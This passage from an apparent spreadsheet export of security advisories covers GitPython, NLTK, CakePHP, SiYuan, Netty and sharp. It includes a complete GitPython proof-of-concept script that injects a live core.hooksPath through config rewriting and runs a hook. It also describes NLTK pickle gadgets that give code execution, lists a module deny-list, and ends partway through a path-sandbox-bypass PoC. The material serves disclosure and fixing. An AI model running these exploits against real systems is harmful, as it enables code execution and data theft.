  3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\n` escape into a real embedded LF.
- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace("\n", "\n\t")` with no re-quoting.
- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.
- `git log -S"string_decode"`, `-S"write_section"`, `-S'replace("\n", "\n\t")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.
- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.

## False-positive check (adversarial re-read)
- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.
- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a "normal" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.
- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.
- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).

## Remediation
Either (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file &lt;path&gt; --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.

## Confidence
High. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.


## Proof-of-Concept source (`gitpython-002-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value
(standard quoted + backslash-continuation syntax, containing an escaped "\\n"
that decodes to a real embedded newline in memory) is corrupted into a NEW,
live config key the moment GitConfigParser re-serializes it during any
unrelated write. If the smuggled second "line" looks like
"hooksPath = &lt;attacker path&gt;", it becomes a real, active core.hooksPath after
one unrelated GitPython config write, and fires attacker code on the next
hook-triggering git operation (e.g. `git commit`).

This is CWE-88/CWE-94 style argument/config injection, but via the READ path
(a config file GitPython parses and later rewrites), not via a Python kwarg
argument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /
GHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all
guard the setter-argument surface only.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-002-poc.py &lt;workdir&gt;

Benign: only writes/reads inside &lt;workdir&gt;. The "malicious" hook just writes a
marker file; no destructive/exfiltrating payload. Exits non-zero and prints
"NOT VULNERABLE" if the corruption / hook does not fire.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-002-poc"
    repo_dir = os.path.join(workdir, "repo")
    hooks_dir = os.path.join(workdir, "evil-hooks")
    marker = os.path.join(workdir, "PWNED_MARKER.txt")

    for p in (repo_dir, hooks_dir):
        os.makedirs(p, exist_ok=True)
    if os.path.exists(marker):
        os.remove(marker)

    subprocess.run(["git", "init", "-q", "-b", "main", repo_dir], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.name", "Test"], check=True)

    # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value
    # inside [core] (before any other section). No raw CR/LF/NUL byte is
    # written to disk here -- this is standard git config quoting +
    # backslash-line-continuation, decoded by both real git and GitConfigParser
    # into the Python string 'A\nhooksPath = ../evil-hooks'.
    cfg_path = os.path.join(repo_dir, ".git", "config")
    with open(cfg_path) as f:
        original = f.read()
    poisoned_entry = '\tzzz = "A\\nhooksPath = ../evil-hooks\\\n"\n'
    # Insert right after the [core] header line so it lives in the same section.
    new_config = original.replace("[core]\n", "[core]\n" + poisoned_entry, 1)
    with open(cfg_path, "w") as f:
        f.write(new_config)

    # Confirm it's inert per real git before touching GitPython.
    pre = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if pre.returncode == 0:
        print("SETUP ERROR: core.hookspath already set before GitPython touched anything")
        sys.exit(2)

    # Malicious hook: benign marker only.
    hook_path = os.path.join(hooks_dir, "pre-commit")
    with open(hook_path, "w") as f:
        f.write('#!/bin/sh\necho "PWNED-VIA-GITPYTHON-CONFIG-INJECTION" &gt; "%s"\nexit 0\n' % marker)
    os.chmod(hook_path, 0o755)

    import git  # gitpython under test

    repo = git.Repo(repo_dir)
    before = repo.config_reader().get_value("core", "zzz")
    print("core.zzz before any GitPython write =", repr(before))

    # ONE totally unrelated, benign write -- this is the only "attacker-adjacent"
    # action required, and it is something virtually every GitPython consumer
    # does routinely (setting an option, adding a remote, updating a branch's
    # tracking config, ...).
    with repo.config_writer() as cw:
        cw.set_value("user", "name", "Test User")

    post = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if post.returncode != 0:
        print("NOT VULNERABLE: core.hookspath still absent after the unrelated write")
        sys.exit(1)

    injected_path = post.stdout.strip()
    print("core.hookspath is now LIVE after one unrelated write:", injected_path)

    # Trigger the hook with a normal commit to prove it fires.
    with open(os.path.join(repo_dir, "file2.txt"), "w") as f:
        f.write("change\n")
    subprocess.run(["git", "-C", repo_dir, "add", "file2.txt"], check=True)
    subprocess.run(
        ["git", "-C", repo_dir, "-c", "user.email=t@example.com", "-c", "user.name=T",
         "commit", "-q", "-m", "trigger hook"],
        check=True,
    )

    if os.path.isfile(marker):
        with open(marker) as f:
            content = f.read().strip()
        print("VULNERABLE: hook fired, marker content =", content)
        sys.exit(0)
    else:
        print("NOT VULNERABLE: hook did not fire")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="S6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="7"><c r="A7" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B7" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C7" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D7" s="5" t="n"><v>9.300000000000001</v></c><c r="E7" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F7" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G7" s="5" t="inlineStr" /><c r="H7" s="5" t="n"><v>0.012</v></c><c r="I7" s="5" t="inlineStr" /><c r="J7" s="5" t="inlineStr" /><c r="K7" s="5" t="inlineStr" /><c r="L7" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M7" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N7" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O7" s="5" t="inlineStr" /><c r="P7" s="5" t="inlineStr" /><c r="Q7" s="5" t="inlineStr"><is><t>CWE-502, CWE-693</t></is></c><c r="R7" s="5" t="inlineStr"><is><t>### Summary

The current source tree still allows arbitrary code execution during supposedly safer allowlisted pickle loading. The allowlist trusts whole module namespaces instead of exact safe globals, so crafted pickles can invoke dangerous in-namespace callables through pickle REDUCE.

### Details

- **Vulnerability type:** Remote code execution via unsafe deserialization
- **Affected component:** `nltk.picklesec.allowlisted_pickle_load`, `nltk.tokenize.punkt.punkt_pickle_load`, `nltk.parse.transitionparser.TransitionParser.parse`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was not the claim target for this bypass.
- **Patched versions:** Not yet patched
- **Root cause:** Module-prefix allowlists include dangerous callables such as `nltk.tokenize.repp.ReppTokenizer._execute` and `numpy.f2py.crackfortran.myeval`.

`punkt_pickle_load()` allowlists both `nltk.tokenize.punkt` and the whole `nltk.tokenize` namespace, which exposes `ReppTokenizer._execute()` and its `subprocess.Popen(...)` sink during unpickling. `TransitionParser.parse()` uses `allowlisted_pickle_load(..., allowed_modules=("numpy", "scipy", "sklearn"))`, which permits `numpy.f2py.crackfortran.myeval()` and its attacker-controlled `eval(...)` path. I confirmed both gadgets create marker files before the caller returns or later aborts on type misuse.

### PoC

**Preconditions**
- The application loads an attacker-controlled tokenizer or model artifact through these public loaders.

**Steps**
1. Create a pickle whose REDUCE callable is `ReppTokenizer._execute` and point its command to a harmless marker-file write.
2. Pass that payload to `punkt_pickle_load(BytesIO(payload))` and observe the marker file is created during unpickling.
3. Create a second pickle whose REDUCE callable is `numpy.f2py.crackfortran.myeval` and load it through `TransitionParser.parse()`.
4. Observe the second marker file is created before `TransitionParser.parse()` later fails on the returned object type.

**Minimal reproducible excerpt**

```text
{'punkt_marker': 'PUNKT_RCE', 'transitionparser_marker': 'TP_RCE'}
```

### Impact

Any caller that trusts these current allowlisted loaders can still execute attacker-controlled commands while loading model or tokenizer artifacts. This defeats the protection mechanism that replaced unrestricted pickle loading and creates a dangerous false sense of safety.

### Remediation

Replace broad module-prefix allowlists with exact `(module, qualname)` pairs for the few safe classes or functions genuinely required. Do not allow entire namespaces such as `nltk.tokenize` or `numpy`, and keep post-load type validation only as a secondary defense.

### Resources

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/punkt.py#L120-L134
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/repp.py#L111-L115
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L26-L30
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L565-L571

---

## Fix + attack demonstration (verified)

 + tightened callers
`find_class` now, before the allowlists:
1. **Rejects any dotted `name`** → closes 4489 with zero legit impact.
2. **Denies dangerous modules** (`os`, `subprocess`, `sys`, `builtins`, `numpy.f2py`, `nltk.tokenize.repp`, …) even under a broad `allowed_modules` — a defense-in-depth **backstop** so a future too-broad allowlist can't silently reopen RCE.
3. **`builtins` denied wholesale**; safe primitives (`int`, `str`, …) must be named exactly via `allowed_globals`.

Callers tightened: punkt drops the broad `nltk.tokenize` (keeps `nltk.tokenize.punkt` + exact `collections.defaultdict`/`builtins.int`); transitionparser keeps numpy/scipy/sklearn (array unpickling needs their submodules) with the new guards blocking the gadgets.

## Full pickle-sink audit
Every deserialization sink in the tree was reviewed: **no raw `pickle.load`** anywhere, and **no** joblib/numpy/torch/dill/yaml/marshal loaders. `data.load` + `wordnet_app` use `RestrictedUnpickler` (blocks all globals — safe); the remaining `pickle_load` sites (`chartparser_app`, `tbl/demo`) load user-selected or self-written files and keep their warning.

## Attack demonstration (captured; fork clone)
```
=== EXPLOITS blocked ===
  4489 sklearn.os.system (dotted)      -&gt; BLOCKED
  x99w numpy.f2py.crackfortran.myeval  -&gt; BLOCKED
  x99w nltk.tokenize.repp._execute     -&gt; BLOCKED
  backstop os.system (os allowlisted)  -&gt; BLOCKED
  backstop builtins.eval (exact global)-&gt; BLOCKED
=== LEGIT loads still work ===
  punkt round-trip via punkt_pickle_load -&gt; OK
  builtins.int (safe primitive)          -&gt; OK
```

## Tests
`test_pickle_allowlist_security.py` — added 5 regressions (dotted traversal, both namespace gadgets, denied-module backstop, legit round-trip). Suite: 122 passed / 9 skipped (sklearn-dependent) across pickle/punkt/transition/tokenize. pre-commit (black/isort/ruff) clean.</t></is></c><c r="S7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="8"><c r="A8" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B8" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C8" s="5" t="inlineStr"><is><t>GHSA-9557-234j-7rv9</t></is></c><c r="D8" s="5" t="n"><v>9.300000000000001</v></c><c r="E8" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F8" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G8" s="5" t="inlineStr" /><c r="H8" s="5" t="inlineStr" /><c r="I8" s="5" t="inlineStr" /><c r="J8" s="5" t="inlineStr" /><c r="K8" s="5" t="inlineStr" /><c r="L8" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M8" s="5" t="inlineStr" /><c r="N8" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O8" s="5" t="inlineStr" /><c r="P8" s="5" t="inlineStr" /><c r="Q8" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R8" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-284h-m62q-gf8w. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.</t></is></c><c r="S8" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-9557-234j-7rv9</t></is></c></row><row r="9"><c r="A9" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B9" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C9" s="5" t="inlineStr"><is><t>GHSA-cw2r-r7mw-j3hc</t></is></c><c r="D9" s="5" t="n"><v>9.300000000000001</v></c><c r="E9" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F9" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G9" s="5" t="inlineStr" /><c r="H9" s="5" t="inlineStr" /><c r="I9" s="5" t="inlineStr" /><c r="J9" s="5" t="inlineStr" /><c r="K9" s="5" t="inlineStr" /><c r="L9" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M9" s="5" t="inlineStr" /><c r="N9" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O9" s="5" t="inlineStr" /><c r="P9" s="5" t="inlineStr" /><c r="Q9" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R9" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-v396-v7q4-x2qj. This link is maintained to preserve external references.

## Original Description

GitPython 3.1.50 fails to recognize joined short-option forms such as -u&lt;value&gt; (the short form of --upload-pack=&lt;value&gt;) when enforcing its default unsafe-option gate. When an application passes attacker-influenced clone options into Repo.clone_from(..., multi_options=..., allow_unsafe_options=False), an attacker can supply -u&lt;helper&gt; to bypass the gate that blocks --upload-pack/-u, causing Git to execute the specified helper command during clone. Fixed in 3.1.51.</t></is></c><c r="S9" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-cw2r-r7mw-j3hc</t></is></c></row><row r="10"><c r="A10" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B10" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C10" s="5" t="inlineStr"><is><t>CVE-2026-77635</t></is></c><c r="D10" s="5" t="n"><v>9.199999999999999</v></c><c r="E10" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F10" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G10" s="5" t="inlineStr" /><c r="H10" s="5" t="n"><v>0.003</v></c><c r="I10" s="5" t="inlineStr" /><c r="J10" s="5" t="inlineStr" /><c r="K10" s="5" t="inlineStr" /><c r="L10" s="5" t="inlineStr"><is><t>composer:cakephp/cakephp, composer:cakephp/database</t></is></c><c r="M10" s="5" t="inlineStr"><is><t>5.1.10, 5.2.15, 5.3.7</t></is></c><c r="N10" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O10" s="5" t="inlineStr" /><c r="P10" s="5" t="inlineStr" /><c r="Q10" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R10" s="5" t="inlineStr"><is><t>### Impact
The `FunctionsBuilder::jsonValue($field, $jsonPath)` methods with the Postgres driver is vulnerable to SQL injection if user controlled data is supplied to the `$jsonPath` parameter.

### Patches
5.1.10, 5.2.15, 5.3.7 

### Workarounds
Don't provide user controlled data to these functions/parameters.</t></is></c><c r="S10" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77635</t></is></c></row><row r="11"><c r="A11" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B11" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C11" s="5" t="inlineStr"><is><t>GHSA-g64v-qqpg-v37h</t></is></c><c r="D11" s="5" t="n"><v>9.199999999999999</v></c><c r="E11" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F11" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G11" s="5" t="inlineStr" /><c r="H11" s="5" t="inlineStr" /><c r="I11" s="5" t="inlineStr" /><c r="J11" s="5" t="inlineStr" /><c r="K11" s="5" t="inlineStr" /><c r="L11" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M11" s="5" t="inlineStr" /><c r="N11" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O11" s="5" t="inlineStr" /><c r="P11" s="5" t="inlineStr" /><c r="Q11" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R11" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-7j72-f6wg-cxw6. This link is maintained to preserve external references.

## Original Description
SiYuan versions before v3.7.3 contain an authentication bypass vulnerability in publish mode where content-returning endpoints getHeadingChildrenDOM, getHeading*Transaction, and getBacklinkDoc perform no password check despite protecting the primary getDoc endpoint. Anonymous attackers can retrieve full content of password-protected documents by obtaining internal block IDs from reader-accessible endpoints and calling unprotected content endpoints to bypass the password gate.</t></is></c><c r="S11" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-g64v-qqpg-v37h</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>GHSA-xx34-6cjg-prh8</t></is></c><c r="D12" s="5" t="n"><v>9.199999999999999</v></c><c r="E12" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="inlineStr" /><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr" /><c r="L12" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M12" s="5" t="inlineStr" /><c r="N12" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O12" s="5" t="inlineStr" /><c r="P12" s="5" t="inlineStr" /><c r="Q12" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R12" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-v684-q882-jgmq. This link is maintained to preserve external references.

## Original Description
SiYuan before v3.7.4 fails to properly validate publish access for encrypted notebooks, treating them as publicly accessible by default. Anonymous readers can enumerate and retrieve fully decrypted document content from unlocked encrypted notebooks through the publish API without authentication or key material.</t></is></c><c r="S12" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-xx34-6cjg-prh8</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D13" s="5" t="n"><v>9.1</v></c><c r="E13" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.003</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr" /><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr"><is><t>maven:io.netty:netty-handler</t></is></c><c r="M13" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N13" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O13" s="5" t="inlineStr" /><c r="P13" s="5" t="inlineStr" /><c r="Q13" s="5" t="inlineStr"><is><t>CWE-475, CWE-754</t></is></c><c r="R13" s="5" t="inlineStr"><is><t>### Summary
A fragmented TLS ClientHello whose handshake header spans multiple records makes Netty silently fall back to the default SslContext; where per-SNI selection is the sole mTLS gate, an unauthenticated attacker can bypass the route's mTLS requirement.

### Details
In `io.netty.handler.ssl.SslClientHelloHandler#decode` the guard that should wait for the 4-byte handshake header checks the wrong offset - it ignores the 5-byte record header that precedes it - and therefore never fires:

```java
if (handshakeLength == -1) {
    if (readerIndex + 4 &gt; endOffset) {
        // Need more data to read HandshakeType and handshakeLength (4 bytes)
        return;
    }
```

When the first record's payload is &lt; 4 bytes, `handshakeLength = in.getUnsignedMedium(readerIndex + SslUtils.SSL_RECORD_HEADER_LENGTH + 1);` leads to `IndexOutOfBoundsException `. That is caught by the generic `catch (Exception)` block, which calls `select(ctx, null)` - this is the default `SslContext`. Fallback to default on parse failure is a problem when per-SNI selection is the sole mTLS gate.

### Impact
SNI routing bypass. Escalates to an unauthenticated mTLS bypass only when:
- mTLS is enforced solely via per-SNI SslContext (clientAuth=REQUIRE)
- the default/fallback SslContext is permissive (clientAuth=NONE/OPTIONAL)
- no secondary peer-certificate verification exists at the application layer.</t></is></c><c r="S13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D14" s="5" t="n"><v>8.9</v></c><c r="E14" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="inlineStr" /><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr" /><c r="L14" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M14" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N14" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O14" s="5" t="inlineStr" /><c r="P14" s="5" t="inlineStr" /><c r="Q14" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R14" s="5" t="inlineStr"><is><t>### Impact
A number of vulnerabilities, two rated as "Critical" severity using CVSSv3, have been discovered and fixed in the upstream libheif dependency. These can lead to possible remote code execution (RCE) on glibc-based Linux when run under certain conditions.

The attack vector for these claims to be "network" however sharp does not provide any networking features so this vulnerability is down-rated to a "High" severity using CVSSv4 but please note its Subsequent System Impact.

Those processing untrusted input with versions of sharp prior to 0.35.4 are affected.

### Patches

#### Using prebuilt binaries provided by sharp?

Most people rely on the prebuilt binaries provided by sharp.

Please upgrade sharp to the latest version, currently 0.35.4, which provides libheif 1.23.2.

#### Using a globally-installed libheif?

Please ensure you are using the latest libheif 1.23.2.

### Workarounds
Add the following to your code to prevent sharp from decoding AVIF images.
```js
sharp.block({ operation: ["VipsForeignLoadHeif"] });
```

Ensure you are using a `node` executable binary compiled as a Position Independent Executable (PIE). Most Linux package managers already do this for protection against RCE however be warned that the "official" Node.js binaries do not.

### References
- [CVE-2026-84383](https://github.com/strukturag/libheif/security/advisories/GHSA-g89c-p67h-r497)
- https://github.com/strukturag/libheif/security/advisories/GHSA-2jg2-4ch7-h545</t></is></c><c r="S14" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D15" s="5" t="n"><v>8.800000000000001</v></c><c r="E15" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F15" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.002</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M15" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N15" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O15" s="5" t="inlineStr" /><c r="P15" s="5" t="inlineStr" /><c r="Q15" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R15" s="5" t="inlineStr"><is><t>## Summary

NLTK corpus-reader constructors can still reach outside-root file and database reads before the `nltk.pathsec` sandbox boundary is enforced.

The PoC shows the safe path blocked by `pathsec.open`, then `LinThesaurusCorpusReader` and `PanLexLiteCorpusReader` succeeding in the same process.

## Affected Product

- Product: NLTK
- Asset / component: `nltk.corpus.reader` constructors
- Version tested: `3.10.2`
- Deployment / package / tag: commit `474af1f5a94b1b8d53fc2b6defec3a2ce7633b74` / PyPI `nltk`
- Environment used for verification: Python 3.13.14

## Vulnerability Details

- Vulnerability class: path sandbox bypass / external control of file path
- Required privileges: none beyond the ability to supply a corpus root path to a consumer call site
- Entry point: `LinThesaurusCorpusReader(root)` and `PanLexLiteCorpusReader(root)`
- Trust boundary crossed: NLTK data-root sandbox enforced by `nltk.pathsec`
- Root affected functions:
  - [CorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/api.py#L73-L80)
  - [LinThesaurusCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/lin.py#L37-L43)
  - [PanLexLiteCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/panlex_lite.py#L45-L46)
- Measured unsafe effect: outside-root file/database reads still happen with `ENFORCE=True`

## Root Cause

`CorpusReader.__init__()` turns a string root into a `FileSystemPathPointer` without any `pathsec` validation, and these readers then use builtin `open()` or `sqlite3.connect()` directly on derived paths. The constructor path therefore never hits the sandbox guard that `pathsec.open()` enforces.

```python
if zipfile:
    root = ZipFilePathPointer(zipfile, zipentry)
else:
    root = FileSystemPathPointer(root)

with open(path) as lin_file:
    ...

self._c = sqlite3.connect(os.path.join(root, "db.sqlite")).cursor()
```

## Proof of Concept

Save the script as `hy01_raw_path_poc.py` in the checkout root and run `python hy01_raw_path_poc.py`.

```python
#!/usr/bin/env python3
"""PoC for HY-01: corpus-reader sandbox bypass.

This script proves three facts:
- pathsec blocks a direct read through the sandboxed file API
- LinThesaurusCorpusReader still reaches builtin open() on an outside path
- PanLexLiteCorpusReader still opens an outside sqlite database and loads data
"""

from __future__ import annotations

import builtins
import pathlib
import sqlite3
import sys
import tempfile
from unittest.mock import patch

try:
    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader
except ModuleNotFoundError:
    here = pathlib.Path(__file__).resolve()
    for base in (here.parent, *here.parents):
        if (base / "nltk").is_dir() and (base / "setup.py").exists():
            sys.path.insert(0, str(base))
            break
    else:
        raise RuntimeError(
            "Could not import nltk. Run this script from an NLTK checkout root "
            "or from an environment where the current checkout is installed."
        )

    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader


def main() -&gt; int:
    pathsec.ENFORCE = True

    with patch.object(pathsec, "_get_allowed_roots", lambda: set()):
        with patch.object(pathsec.os, "getcwd", lambda: "sandbox-disabled"):
            with tempfile.TemporaryDirectory() as tmp:
                tmpdir = pathlib.Path(tmp)
